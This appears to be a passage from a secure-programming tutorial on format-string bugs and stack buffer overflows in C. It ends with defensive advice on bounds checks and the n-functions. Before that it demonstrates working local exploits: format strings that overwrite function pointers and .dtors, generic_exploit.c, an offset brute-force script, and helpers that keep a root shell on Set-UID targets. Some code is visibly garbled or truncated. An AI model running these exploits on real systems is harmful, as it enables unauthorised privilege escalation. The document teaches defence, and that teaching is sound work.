[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since the format string is longer than in the previous example, the stack moved: ptrf has gone from 0xbffff5d4 to 0xbffff5b4. Our values need to be adjusted:

>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on overwriting the return address of a function. Then, you have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOPs). You don’t need all this with format bugs, and you are no longer restricted to overwriting the return address.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor (named .dtors). Each of these sections contains pointers to functions to be carried out before entering the main() function and after exiting, respectively.

/* cdtors */

#include <stdio.h>

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");
  return 0;
}

void start(void) {
  printf("in start()\n");
}

void end(void) {
  printf("in end()\n");
}

Our small program shows that mechanism:

>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()

Each one of these sections is built in the same way:

>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............

We check that the indicated addresses match those of our functions (attention : the preceding objdump command gives the addresses in little endian):

>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end

So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to get the location in memory of these sections, which is really easy when you have the binary at hand ;-) Simply use the objdump like we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........

Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with the address of the function we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which indicates the end of the section. This will cause a segmentation fault because the program, not finding this 0x00000000, will take the next value as the address of a function, which it probably is not.

In fact, the only interesting section is the destructor section (.dtors): we have no time to do anything before the constructor section (.ctors). Usually, it is enough to overwrite the address placed 4 bytes after the start of the section (the 0xffffffff):

  • if there is no address there, we overwrite the 0x00000000;
  • otherwise, the first function to be executed will be ours.

Let’s go back to our example. We replace the 0x00000000 in section .dtors, located at 0x8049848=0x8049844+4, with the address of the accesForbidden() function, already known (0x8048664):

>./vuln `./build 0x8049848 0x8048664 3`
adr : 134518856 (8049848)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[JH%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = bffff694 (0xbffff51c)
helloWorld() = 0x8048648
accessForbidden() = 0x8048664

before : ptrf() = 0x8048648 (0xbffff434)
buffer = [JH0000000000000000000000000000000000000000000000000000
000] (127)
after : ptrf() = 0x8048648 (0xbffff434)
Welcome in "helloWorld"
You shouldn't be here "accesForbidden"
Segmentation fault (core dumped)

Everything runs fine: main(), then helloWorld(), then exit. The destructor is then called. The .dtors section starts with the address of accesForbidden(). Then, since there is no other real function address, the expected core dump happens.

Please, give me a shell

We have seen simple exploits here. Using the same principle we can get a shell, either by passing the shellcode through argv[] or an environment variable to the vulnerable program. We just have to set the right address (i.e. the address of the eggshell) in the section .dtors.

Right now, we know:

  • how to explore the stack within reasonable limits (in fact, theoretically, there is no limit, but it gets rather painful rather quickly to recover the words on the stack one by one);
  • how to write the expected value to the right address.

However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).

The idea is based on recursive calls of the function exec*():

/* argv.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv) {

  char **env;
  char **arg;
  int nb = atoi(argv[1]), i;

  env    = (char **) malloc(sizeof(char *));
  env[0] = 0;

  arg    = (char **) malloc(sizeof(char *) * 3);  /* arg[0], arg[1], NULL */
  arg[0] = argv[0];
  arg[1] = (char *) malloc(5);
  snprintf(arg[1], 5, "%d", nb-1);
  arg[2] = 0;

  /* printings */
  printf("*** argv %d ***\n", nb);
  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");

  /* recall */
  if (nb == 0)
    exit(0);
  execve(argv[0], arg, env);
}

The input is an integer nb; the program recursively calls itself nb+1 times:

>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice that the addresses allocated for arg and argv no longer move after the second call. We are going to use this property in our exploit. We just have to change our build program slightly to make it call itself before calling vuln. So, we get the exact argv address, and that of our shellcode:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/* Same function as in build.c */
char* build(unsigned int addr, unsigned int value, unsigned int where);

int main(int argc, char **argv) {

  char *buf;
  char shellcode[] =

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,    /* value: address of the shellcode */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen(buf));
    execlp(argv[0], argv[0], buf, shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* address */
        (unsigned int) argv[2],      /* value: address of the shellcode */
        atoi(argv[4]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }

  return EXIT_SUCCESS;
}

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give build2 the address we want to write to and the offset. We no longer have to give the value, since it is worked out by our successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why we call the build() function, in order to use the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

Why didn’t this work? We said we had to keep an exact copy of the memory layout between the 2 calls, and we didn’t do it! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and then vuln (4 bytes). There is a difference of 2 bytes, which is exactly the difference you can see in the example above. The address of the shellcode during the second call of build2 is given by sc = 0xbffff88f, but argv[2] in vuln is at 0xbffff891: our 2 bytes. To solve this, it is enough to rename our build2 to a 4-letter name, e.g. bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)

Won again : that works much better that way ;-) The eggshell is in the stack and we changed the address pointed to by ptrf to have it point to our shellcode. Of course, it can happen only if the stack is executable.

But we have seen that format strings allow us to write anywhere : let’s add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit

Here, no coredump is created while quitting our destructor. This is because our shellcode contains an exit(0) call.

In conclusion as a last gift, here is build3.c that also gives a shell, but passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

extern char **environ;

/* Same function as in build.c */
char* build(unsigned int addr, unsigned int value, unsigned int where);

int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =

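  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = (unsigned char *) build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,    /* value: address of the shellcode */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "%d\n", (int)strlen((char *)buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen((char *)buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0] = argv[0];
    arg[1] = (char *) buf;
    arg[2] = NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0] = (char *) shellcode;     /* environ[0]: the shellcode */
    env[1] = argv[1];                /* environ[1]: address to write to */
    env[2] = argv[2];                /* environ[2]: offset */
    env[3] = NULL;
    execve(argv[0], arg, env);
  } else
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = (unsigned char *) build(strtoul(environ[1], NULL, 16),  /* address */
        (unsigned int) environ[0],      /* value: address of the shellcode */
        atoi(environ[2]));              /* offset */

    fprintf(stderr, "%d\n", (int)strlen((char *)buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int)strlen((char *)buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0] = argv[0];
    arg[1] = (char *) buf;
    arg[2] = NULL;
    execve("./vuln", arg, environ);
  }

  return 0;
}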

Once again, since the environment is in the stack, we must take care not to modify the memory layout (i.e. the position of the variables and arguments). The binary’s name must contain the same number of characters as the name of the vulnerable program, vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.

We leave you to play with it: this (too) long article is already filled with too much source code and test programs.

Conclusion : how to avoid format bugs ?

As shown in this article, the main trouble with this bug comes from the freedom left to users to build their own format string. The solution to avoid such a flaw is very simple: never let a user provide the format string! Most of the time, this simply means inserting a "%s" format string when functions such as printf(), syslog(), ... are called. If you really can’t avoid it, then you have to check the input given by the user very carefully.


The authors thank Pascal Kalou Bouchareine for his patience (he had to find why our exploit with the shellcode in the stack did not work … whereas this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragements … but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)



1. commands: the word command means here everything that affects the format of the string: the width, the precision, …
2. bytes: the -1 comes from the last character reserved for the '\0'.

Avoiding security holes when developing an application – Part 3 : buffer overflows

Buffer overflows

In our previous article we wrote a small program of about 50 bytes that was able to start a shell, or exit in case of failure. Now we must insert this code into the application we want to attack. This is done by overwriting the return address of a function, replacing it with the address of our shellcode. You do this by forcing the overflow of an automatic variable allocated in the process stack.

For example, in the following program, we copy the string given as first argument in the command line to a 500 byte buffer. This copy is done without checking if it’s larger than the buffer size. As we’ll see later on, using the strncpy() function allows us to avoid this problem.

  /* vulnerable.c */

  #include <string.h>

  int main(int argc, char * argv [])
  {
    char buffer [500];

    if (argc > 1)
      strcpy(buffer, argv[1]);
    return (0);
  }

buffer is an automatic variable; the space used by the 500 bytes is reserved in the stack as soon as we enter the main() function. When running the vulnerable program with an argument longer than 500 characters, the data overflows the buffer and “invades” the process stack. As we’ve seen before, the stack holds the address of the next instruction to be executed (aka the return address). To exploit this security hole, it is enough to replace the return address of the function with the address of the shellcode we want to execute. This shellcode is inserted into the body of the buffer, followed by its address in memory.

Position in memory

Getting the memory address of the shellcode is rather tricky. We must discover the offset between the %esp register pointing to the top of the stack and the shellcode address. To benefit from a margin of safety, the beginning of the buffer is filled up with the NOP assembly instruction; it’s a one byte neutral instruction having no effect at all. Thus, when the starting address points before the true beginning of the shellcode, the CPU goes from NOP to NOP till it reaches our code. To get more chance, we put the shellcode in the middle of the buffer, followed by the starting address repeated till the end, and preceded by a NOP block. The diagram 1 illustrates this:

Diag. 1 : buffer especially filled up for the exploit.

Diagram 2 describes the state of the stack before and after the overflow. It causes all the saved information (saved %ebp, saved %eip, arguments,…) to be replaced with the new expected return address: the start address of the part of the buffer where we put the shellcode.

Diag. 2 : state of the stack before and after the overflow

However, there is another problem related to variable alignment within the stack. An address is longer than 1 byte and is therefore stored in several bytes, so it may not always land exactly on the right boundary within the stack. Trial and error finds the right alignment. Since our CPU uses 4-byte words, the alignment is 0, 1, 2 or 3 bytes (see Part 2, article 183, about stack organization). In diagram 3, the grayed parts correspond to the written 4 bytes. The first case, where the return address is overwritten completely with the right alignment, is the only one that will work. The others lead to segmentation violation or illegal instruction errors. This empirical search works fine since today’s computing power allows this kind of testing.

Diag. 3 : possible alignment with 4 bytes words

Launch program

We are going to write a small program to launch a vulnerable application by writing data which will overflow the stack. This program has various options to set the position of the shellcode in memory and to choose which program to run. This version, inspired by Aleph One’s article in Phrack magazine issue 49, is available from Christophe Grenier’s website.

How do we send our prepared buffer to the target application ? Usually, you can use a command line parameter like the one in vulnerable.c or an environment variable. The overflow can also be caused by typing in the data or just reading it from a file.

The generic_exploit.c program starts by allocating the right buffer size; next it copies the shellcode there and fills the buffer with the addresses and the NOP codes as explained above. It then prepares an argument array and runs the target application using the execve() call, which replaces the current process with the invoked one. The generic_exploit program needs to know the buffer size to exploit (a bit bigger than the target’s buffer, to be able to overwrite the return address), the memory offset and the alignment. We indicate whether the buffer is passed as an environment variable (var) or on the command line (novar). The force/noforce argument determines whether the shellcode calls setuid()/setgid().

/* generic_exploit.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#define NOP                     0x90

char shellcode[] =

unsigned long get_sp(void)
{
   __asm__("movl %esp,%eax");
}

#define A_BSIZE     1
#define A_OFFSET    2
#define A_ALIGN     3
#define A_VAR       4
#define A_FORCE     5
#define A_PROG2RUN  6
#define A_TARGET    7
#define A_ARG       8

int main(int argc, char *argv[])
   char *buff, *ptr;
   char **args;
   long addr;
   int offset, bsize;
   int i,j,n;
   struct stat stat_struct;
   int align;
   if(argc < A_ARG)
   {
      printf("USAGE: %s bsize offset align (var / novar) "
             "(force/noforce) prog2run target param\n", argv[0]);
      return -1;
   }
   if(stat(argv[A_TARGET], &stat_struct))
   {
     printf("\nCannot stat %s\n", argv[A_TARGET]);
     return 1;
   }
   bsize  = atoi(argv[A_BSIZE]);
   offset = atoi(argv[A_OFFSET]);
   align  = atoi(argv[A_ALIGN]);

   if(!(buff = malloc(bsize)))
   {
      printf("Can't allocate memory.\n");
      exit(0);
   }

   addr = get_sp() + offset;
   printf("bsize %d, offset %d\n", bsize, offset);
   printf("Using address: 0lx%lx\n", addr);

   for(i = 0; i < bsize; i+=4) *(long*)(&buff[i]+align) = addr;

   for(i = 0; i < bsize/2; i++) buff[i] = NOP;

   ptr = buff + ((bsize/2) - strlen(shellcode) - strlen(argv[4]));
       printf("uid %d\n", stat_struct.st_uid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_uid & 0xFF)
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_uid;
       if(stat_struct.st_uid & 0xFF00)
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_uid;
       *(ptr++)= 0xb0;          /* movb $0x17,%al   */
       *(ptr++)= 0x17;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
       printf("gid %d\n", stat_struct.st_gid);
       *(ptr++)= 0x31;          /* xorl %eax,%eax   */
       *(ptr++)= 0xc0;
       *(ptr++)= 0x31;          /* xorl %ebx,%ebx   */
       *(ptr++)= 0xdb;
       if(stat_struct.st_gid & 0xFF)
     *(ptr++)= 0xb3;        /* movb $0x??,%bl   */
     *(ptr++)= stat_struct.st_gid;
       if(stat_struct.st_gid & 0xFF00)
     *(ptr++)= 0xb7;        /* movb $0x??,%bh   */
     *(ptr++)= stat_struct.st_gid;
       *(ptr++)= 0xb0;          /* movb $0x2e,%al   */
       *(ptr++)= 0x2e;
       *(ptr++)= 0xcd;          /* int $0x80        */
       *(ptr++)= 0x80;
   /* Patch shellcode */
   shellcode[13] = shellcode[23] = n + 5;
   shellcode[5] = shellcode[20] = n + 1;
   shellcode[10] = n;
   for(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
   /* Copy prog2run */
   printf("Shellcode will start %s\n", argv[A_PROG2RUN]);

   buff[bsize - 1] = '\0';

   args = (char**)malloc(sizeof(char*) * (argc - A_TARGET + 3));
   for(i = A_TARGET; i < argc; i++)
     args[j++] = argv[i];
     return execve(args[0],args,NULL);
     return execv(args[0],args);

To benefit from vulnerable.c, we must have a buffer bigger than the one expected by the application. For instance, we select 600 bytes instead of the 500 expected. We find the offset relative to the top of the stack by successive tests. The address built with the addr = get_sp() + offset; instruction is used to overwrite the return address; you get it right ... with a bit of luck! The operation relies on the heuristic that the %esp register won’t move too much between the current process and the one called at the end of the program. In practice, nothing is certain: various events might modify the stack state between the time of the computation and the time the program to exploit is called. Here, we succeeded in triggering an exploitable overflow with a -1900 bytes offset. Of course, to complete the experiment, the vulnerable target must be Set-UID root.

  $ cc vulnerable.c -o vulnerable
  $ cc generic_exploit.c -o generic_exploit
  $ su
  # chown root.root vulnerable
  # chmod u+s vulnerable
  # exit
  $ ls -l vulnerable
  -rws--x--x   1 root     root        11732 Dec  5 15:50 vulnerable
  $ ./generic_exploit 600 -1900 0 novar noforce /bin/sh ./vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe54
  Shellcode will start /bin/sh
  bash# id
  uid=1000(raynal) gid=100(users) euid=0(root) groups=100(users)
  bash# exit
  $ ./generic_exploit 600 -1900 0 novar force /bin/sh /tmp/vulnerable
  bsize 600, offset -1900
  Using address: 0lxbffffe64
  uid 0
  Shellcode will start /bin/sh
  bash# id
  uid=0(root) gid=100(users) groups=100(users)
  bash# exit

In the first case (noforce), our uid doesn’t change. Nevertheless we have a new euid providing us with all the rights. Thus, even if vi says while editing /etc/passwd that it is read-only, we can still write the file and all the changes will work: you just have to force the writing with w! :) The force parameter gives uid=euid=0 from the start.

To automatically find offset values for an overflow we can use the following small shell script:

 #! /bin/sh
  while [ $OFFSET -lt $OFFSET_MAX ] ; do
    echo "Offset = $OFFSET"
    ./generic_exploit $BUFFER $OFFSET 0 novar force /bin/sh ./vulnerable
    OFFSET=$(($OFFSET + 4))
  done

In our exploit we didn’t take potential alignment problems into account. It is therefore possible that this example doesn’t work for you with the same values, or doesn’t work at all because of the alignment. (Those wanting to test anyway have to change the alignment parameter, 0 here, to 1, 2 or 3.) Some systems don’t accept writes to memory that are not aligned on a whole word, but this is not true for Linux.

shell(s) problems

Unfortunately, sometimes the obtained shell is unusable since it ends on its own or when pressing a key. We use another program to keep privileges that we so carefully acquired:

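/* set_run_shell.c */
#include <unistd.h>
#include <sys/stat.h>

int main()
{
  /* give /tmp/run_shell to the effective user and group ... */
  chown ("/tmp/run_shell", geteuid(), getegid());
  /* ... and set its Set-UID and Set-GID bits */
  chmod ("/tmp/run_shell", 06755);
  return 0;
}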

Since our exploit is only able to do one task at a time, we are going to transfer the rights gained to the run_shell program with the help of the set_run_shell program. We’ll then get the desired shell.

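/* run_shell.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main()
{
  /* Body assumed from the surrounding text: align the real IDs
     with the effective ones, then start an interactive shell */
  setuid(geteuid());
  setgid(getegid());
  execl("/bin/sh", "sh", "-i", (char *) NULL);
  exit (0);
}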

The -i option corresponds to interactive. Why not give the rights directly to a shell ? Just because the s bit is not available for every shell. The recent versions check that uid is equal to euid, and likewise for gid and egid. Thus bash2 and tcsh incorporate this line of defense, but neither bash nor ash has it. This method must be refined when the partition on which run_shell is located (here, /tmp) is mounted nosuid or noexec.


Since we have a Set-UID program with a buffer overflow bug and its source code, we are able to prepare an attack allowing execution of arbitrary code under the ID of the file owner. However, our goal is to avoid security holes. Now we are going to examine a few rules to prevent buffer overflows.

Checking indexes

The first rule to follow is just a matter of good sense : the indexes used to manipulate an array must always be checked carefully. A “clumsy” loop like :

  for (i = 0; i <= n; i ++) {
    table [i] = ...
  }

probably holds an error because of the <= sign instead of <, since an access is done beyond the end of the array. While this is easy to see in that loop, it’s more difficult with a loop using decreasing indexes since you must ensure that you are not going below zero. Apart from the trivial for(i=0; i<n ; i++) case, you must check the algorithm several times (or even ask someone else to check for you), especially when the index is modified inside the loop.
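The decreasing-index case can be sketched as follows. This is only an illustration: fill_backwards() is a hypothetical helper, not part of the article's programs. It uses an unsigned index, for which a test such as i >= 0 would always be true, so the index is tested before it is decremented.

```c
#include <stddef.h>

/* Hypothetical helper: fill table[0..n-1] with `value`, walking the
   indexes downward. The index is checked before being decremented,
   so the loop never reaches "index -1". */
void fill_backwards(int *table, size_t n, int value)
{
  size_t i;

  for (i = n; i > 0; i--)
    table[i - 1] = value;   /* touches n-1 down to 0 */
}
```

Writing the loop as for (i = n - 1; i >= 0; i--) with an unsigned i would never terminate properly, which is the kind of mistake the paragraph above warns about.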

The same type of problem is found with strings : you must always remember to add one more byte for the final null character. One of the newbie’s most frequent mistakes lies in forgetting the string terminator. Worse, it’s hard to diagnose since unpredictable variable alignments (e.g. compiling with debug information) can hide the problem.

Don’t underestimate array indexes as a threat to application security. We have seen (check Phrack issue 55) that only a one byte overflow is enough to create a security hole, inserting the shellcode into an environment variable, for instance.

  #define BUFFER_SIZE 128

  void foo(void) {

    char buffer[BUFFER_SIZE+1];
    int i;

    /* end of string */
    buffer[BUFFER_SIZE] = '\0';

    for (i = 0; i<BUFFER_SIZE; i++)
      buffer[i] = ...
  }

Using n functions

As a convention, standard C library functions are aware of the end of the string because of a null byte. For example, the strcpy(3) function copies the original string content into a destination string until it reaches this null byte. In some cases, this behavior becomes dangerous; we have seen the following code contains a security hole :

  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT];
    strcpy (identity, name);
    ...
  }

Functions that limit the copy length avoid this problem. These functions have an `n' in the middle of their name, for instance strncpy(3) as a replacement for strcpy(3), strncat(3) for strcat(3) or even strnlen(3) for strlen(3).

However, you must be careful with the strncpy(3) limitation since it has side effects : when the source string is shorter than the limit, the copy is padded with null characters up to the n limit, which costs some performance. On the other hand, if the source string is longer, it is truncated and the copy does not end with a null character. You must then add it manually. Taking this into account, the previous routine becomes :

  #define LG_IDENT 128

  int fonction (const char * name)
  {
    char identity [LG_IDENT+1];
    strncpy (identity, name, LG_IDENT);
    identity [LG_IDENT] = '\0';
    ...
  }
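Both strncpy(3) effects can be observed with a small sketch. The copy_ident() helper and the deliberately tiny LG_IDENT value are assumptions made for the illustration only.

```c
#include <string.h>

#define LG_IDENT 8   /* small on purpose, for illustration only */

/* Copies name into identity, which must hold LG_IDENT + 1 bytes.
   Returns 1 if the name had to be truncated, 0 otherwise. */
int copy_ident(char *identity, const char *name)
{
  strncpy(identity, name, LG_IDENT);  /* pads with '\0' if name is short */
  identity[LG_IDENT] = '\0';          /* strncpy adds none if name is long */
  return strlen(name) > LG_IDENT;
}
```

With a short name such as "bob", the remaining bytes up to LG_IDENT are filled with null characters; with a name longer than LG_IDENT, only the manually added terminator ends the string.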

Of course, the same principles apply to routines manipulating wide characters (more than 8 bits) : for instance wcsncpy(3) should be preferred to wcscpy(3), and wcsncat(3) to wcscat(3). Sure, the program gets bigger but the security improves, too.

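Like strcpy(), strcat(3) doesn’t check buffer size. The strncat(3) function appends at most n characters from the source and then always adds a terminating null character. Its limit counts the characters taken from the source, not the size of the destination, so the space already used in the destination must be subtracted. Replacing strcat(buffer1, buffer2); with strncat(buffer1, buffer2, sizeof(buffer1) - strlen(buffer1) - 1); eliminates the risk.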
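Since the third argument of strncat(3) bounds the number of characters taken from the source, the room left in the destination has to be computed first. A minimal sketch, assuming the destination already holds a valid null-terminated string; bounded_append() is a hypothetical helper :

```c
#include <string.h>

/* Hypothetical helper: append src to dst, where dst_size is the total
   size of the dst array. Returns 1 if src was truncated, 0 otherwise. */
int bounded_append(char *dst, size_t dst_size, const char *src)
{
  size_t used = strlen(dst);
  size_t room;

  if (used + 1 >= dst_size)
    return src[0] != '\0';     /* no room left for any character */

  room = dst_size - used - 1;  /* keep one byte for the final '\0' */
  strncat(dst, src, room);     /* strncat always writes the '\0' */
  return strlen(src) > room;
}
```

The return value lets the caller decide whether a truncated result is acceptable, which is rarely the case for a path or a hostname.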

The sprintf() function copies formatted data into a string. It also has a version that checks the number of bytes to copy : snprintf(). With a C99-conforming library, this function returns the number of characters the complete output needs (without taking into account the final `\0'), even when the result had to be truncated. Testing this return value tells you if the writing has been done properly :

  int n = snprintf(dst, sizeof(dst), "%s", src);
  if (n < 0 || (size_t) n >= sizeof(dst)) {
    /* Overflow */
  }
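The same check can be wrapped in a function that receives the destination size explicitly, which is needed as soon as the destination is a pointer rather than an array. This is a sketch only : format_address() is a hypothetical helper, and it assumes a C99 snprintf() that returns the length the full output would have had.

```c
#include <stdio.h>

/* Hypothetical helper: format "user@host" into dst.
   Returns 0 on success, -1 if the result did not fit or on error. */
int format_address(char *dst, size_t dst_size,
                   const char *user, const char *host)
{
  int n = snprintf(dst, dst_size, "%s@%s", user, host);

  if (n < 0 || (size_t)n >= dst_size)
    return -1;                 /* truncated: do not use dst */
  return 0;
}
```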

Obviously, this protection is worthless as soon as the user controls the number of bytes to copy. Such a hole in BIND (Berkeley Internet Name Daemon) kept a lot of crackers busy :

  struct hostent *hp;
  unsigned long address;


  /* copy of an address */
  memcpy(&address, hp->h_addr_list[0], hp->h_length);

This should always copy 4 bytes. Nevertheless, if you can change hp->h_length, then you are able to modify the stack. Accordingly, it’s compulsory to check the data length before copying :

  struct hostent *hp;
  unsigned long address;


  /* test */
  if (hp->h_length > sizeof(address))
    return 0;

  /* copy of an address */
  memcpy(&address, hp->h_addr_list[0], hp->h_length);
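The test can also be isolated in a small function. In this sketch copy_address() is a hypothetical helper; its length and src parameters stand for untrusted values such as hp->h_length and hp->h_addr_list[0]. Since h_length is a signed int, a negative value is rejected too : converted to the unsigned size expected by memcpy(), it would become a huge length.

```c
#include <string.h>

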